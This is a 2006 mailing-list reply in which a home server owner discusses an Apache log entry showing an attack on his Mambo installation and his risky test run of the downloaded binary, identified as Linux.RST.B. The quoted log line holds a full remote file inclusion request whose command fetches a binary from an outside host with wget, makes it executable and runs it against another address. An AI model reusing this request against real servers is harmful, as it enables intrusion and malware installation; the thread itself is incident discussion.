Re: Strange Apache log and mambo security - sexy executable
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Edward Shornock schrieb:
> > On Mon, Jan 23, 2006 at 08:31:40AM +0100, Maik Holtkamp wrote:
> > Hi,
> >
> > yesterday morning I found a strange entry in my apache log files (debian
> > sarge, apache 1.3, mambo 4.5.3, kernel 2.4.31). It's a dyndns homelan
> > Server, just serving my Family and some good friends (normally).
> >
> > ---cut---
> > 132.248.204.65 - - [19/Jan/2006:07:08:32 +0100] "GET
> > /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://200.72.130.29/cmd.gif?&cmd=cd%20/tmp;wget%20212.20
> > 3.97.120/sexy;chmod%20744%20sexy;./sexy%2071.137.131.26%208080;00;echo%20YYY;echo|
> > HTTP/1.1" 200 28 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > ---cut---
> >
> > As I patched mambo against recent "register global" attack and my /tmp
> > is mount noexec, the attack doesn't exploit anything.
> >
> > However, I curiously downloaded this sexy executable to have a closer look.
> >
> > ---cut---
> > backup:/home/qmb# ./sexy -h
> > ./sexy <host> <port>
> > ---cut---
> >
> Never run apps like this as root. Bad bad idea.
There is an old saying in Germany:
"Only damage will make you wise"
In spite the box where I tried was on the second line and I did not pass
any arguments (IP/port) to the tool, I see the chance that it would have
polluted the whole LAN and probably even find a way to the outside, now.
Thanks god it wasn't that evil, so the knoppix restore could fix the
situation.
> If you want more information about this tool, google for "Linux.RST.B"
> or "Unix/RST.B".
Thank you very much.
- --
- - maik
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org
iD8DBQFD1LDZz3bq6aadmI8RAj/fAJ93fsZEUSRiPNRGUqs7Q7t6pDOF8wCeK1Tn
LzAJkhxI+Kfs5njhvwZ/Xio=
=3tRt
-----END PGP SIGNATURE-----
Reply to: